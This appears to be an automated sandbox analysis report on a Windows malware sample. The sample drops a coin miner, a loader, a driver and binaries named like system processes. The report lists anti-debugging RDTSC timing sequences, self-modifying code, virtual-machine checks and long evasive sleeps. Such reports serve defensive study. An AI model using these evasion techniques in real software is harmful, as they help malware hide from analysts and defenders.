Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50BE6 second address: 4C50C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov bx, 5CC2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624C75304h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC05E0 second address: 4CC05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC05E6 second address: 4CC068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, ebx 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FF624C75304h 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF624C752FEh 0x0000001e jmp 00007FF624C75305h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FF624C75300h 0x0000002a jmp 00007FF624C75305h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FF624C752FEh 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF624C75307h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC068C second address: 4CC0692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0692 second address: 4CC0696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0696 second address: 4CC069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC03C4 second address: 4CC044C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF624C752FFh 0x00000009 or esi, 5D9865EEh 0x0000000f jmp 00007FF624C75309h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FF624C75300h 0x0000001b or si, C568h 0x00000020 jmp 00007FF624C752FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a jmp 00007FF624C75306h 0x0000002f mov ebp, esp 0x00000031 jmp 00007FF624C75300h 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC044C second address: 4CC0469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C601EC second address: 4C601F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C601F2 second address: 4C601F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C601F8 second address: 4C601FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C601FC second address: 4C60236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624B4E7E7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60236 second address: 4C6025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624C75306h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6025C second address: 4C6027F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF624B4E7DBh 0x00000012 pop eax 0x00000013 movsx edx, ax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC08DC second address: 4CC091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+0Ch] 0x0000000d pushad 0x0000000e mov edi, 42074EF8h 0x00000013 call 00007FF624C75301h 0x00000018 call 00007FF624C75300h 0x0000001d pop ecx 0x0000001e pop ebx 0x0000001f popad 0x00000020 push dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC091C second address: 4CC0931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0931 second address: 4CC096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF624C752F9h 0x0000000d jmp 00007FF624C752FDh 0x00000012 push eax 0x00000013 jmp 00007FF624C75301h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC096B second address: 4CC096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC096F second address: 4CC0975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0975 second address: 4CC09DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF624B4E7DAh 0x00000014 or ecx, 6A234FA8h 0x0000001a jmp 00007FF624B4E7DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FF624B4E7E8h 0x00000026 adc ecx, 2A5FC208h 0x0000002c jmp 00007FF624B4E7DBh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70598 second address: 4C70612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushfd 0x00000006 jmp 00007FF624C752FBh 0x0000000b or ax, 51EEh 0x00000010 jmp 00007FF624C75309h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov al, dh 0x0000001d movzx esi, di 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FF624C752FBh 0x00000027 mov ebp, esp 0x00000029 jmp 00007FF624C75306h 0x0000002e push FFFFFFFEh 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FF624C75307h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70612 second address: 4C7069B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FF624B4E7D9h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF624B4E7DCh 0x00000015 or si, 5888h 0x0000001a jmp 00007FF624B4E7DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FF624B4E7E8h 0x00000026 sbb si, BAE8h 0x0000002b jmp 00007FF624B4E7DBh 0x00000030 popfd 0x00000031 popad 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 jmp 00007FF624B4E7E2h 0x0000003b mov edx, esi 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7069B second address: 4C70756 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 mov bh, 12h 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 mov edx, 38A5083Eh 0x0000001c pushfd 0x0000001d jmp 00007FF624C752FFh 0x00000022 or ah, FFFFFFEEh 0x00000025 jmp 00007FF624C75309h 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 jmp 00007FF624C75301h 0x00000035 pop eax 0x00000036 pushad 0x00000037 call 00007FF624C752FCh 0x0000003c call 00007FF624C75302h 0x00000041 pop ecx 0x00000042 pop edx 0x00000043 mov di, si 0x00000046 popad 0x00000047 call 00007FF624C752F9h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF624C75309h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70756 second address: 4C70766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70766 second address: 4C707AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF624C75309h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF624C75303h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C707AC second address: 4C707B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9CED45 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B7000E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B70386 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B97678 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B75F1A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BF1ABC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: C8ED45 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E3000E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E30386 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E57678 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E35F1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: EB1ABC instructions caused by: Self-modifying code

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Memory allocated: 850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Memory allocated: 1B410000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: 850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: 1AFA0000 memory reserve \| memory write watch
Source: C:\Windows\System32\services64.exe	Memory allocated: 17C0000 memory reserve \| memory write watch
Source: C:\Windows\System32\services64.exe	Memory allocated: 1B8B0000 memory reserve \| memory write watch
Source: C:\Windows\System32\services64.exe	Memory allocated: C60000 memory reserve \| memory write watch
Source: C:\Windows\System32\services64.exe	Memory allocated: 1B3C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: 1B5C0000 memory reserve \| memory write watch
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Memory allocated: CA0000 memory reserve \| memory write watch
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Memory allocated: 1B220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: D40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: 1B3E0000 memory reserve \| memory write watch
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Memory allocated: CB0000 memory reserve \| memory write watch
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Memory allocated: 1B2A0000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CC0942 rdtsc

0_2_04CC0942

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,

7_2_00401B3F

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\services64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\services64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599854
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599716
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599534
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599285
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599127
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598988
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598850
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598734
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599803
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599687
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599552
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599436
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599327
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 599108
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 632	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 367	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 570	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6915
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1925
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7248
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2363
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8090
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8107
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8396
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Window / User API: threadDelayed 1418
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8604
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 492
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Window / User API: threadDelayed 579
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Window / User API: threadDelayed 1064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9208
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6049
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3564
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7996
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1373
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6750
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2914

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe

Dropped PE file which has not been started: C:\Windows\System32\Microsoft\Libs\WR64.sys

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3132	Thread sleep time: -54027s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6036	Thread sleep count: 632 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6036	Thread sleep time: -1264632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3568	Thread sleep count: 367 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3568	Thread sleep time: -11010000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4852	Thread sleep time: -1080000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3180	Thread sleep count: 641 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3180	Thread sleep time: -1282641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1544	Thread sleep count: 570 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1544	Thread sleep time: -1140570s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 5944	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 7212	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 7212	Thread sleep time: -1020000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe TID: 7696	Thread sleep time: -570000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe TID: 7532	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe TID: 1436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep count: 2894 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep count: 6915 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916	Thread sleep count: 7641 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4600	Thread sleep count: 1925 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 2740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 8008 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396	Thread sleep count: 1292 > 30
Source: C:\Windows\System32\services64.exe TID: 5960	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1236	Thread sleep count: 7248 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896	Thread sleep count: 2363 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\services64.exe TID: 888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304	Thread sleep count: 8090 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996	Thread sleep count: 8107 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2784	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020	Thread sleep count: 8396 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260	Thread sleep count: 133 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6192	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6412	Thread sleep count: 1418 > 30
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -599854s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -599716s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -599534s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -599285s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -599127s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -598988s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436	Thread sleep time: -598850s >= -30000s
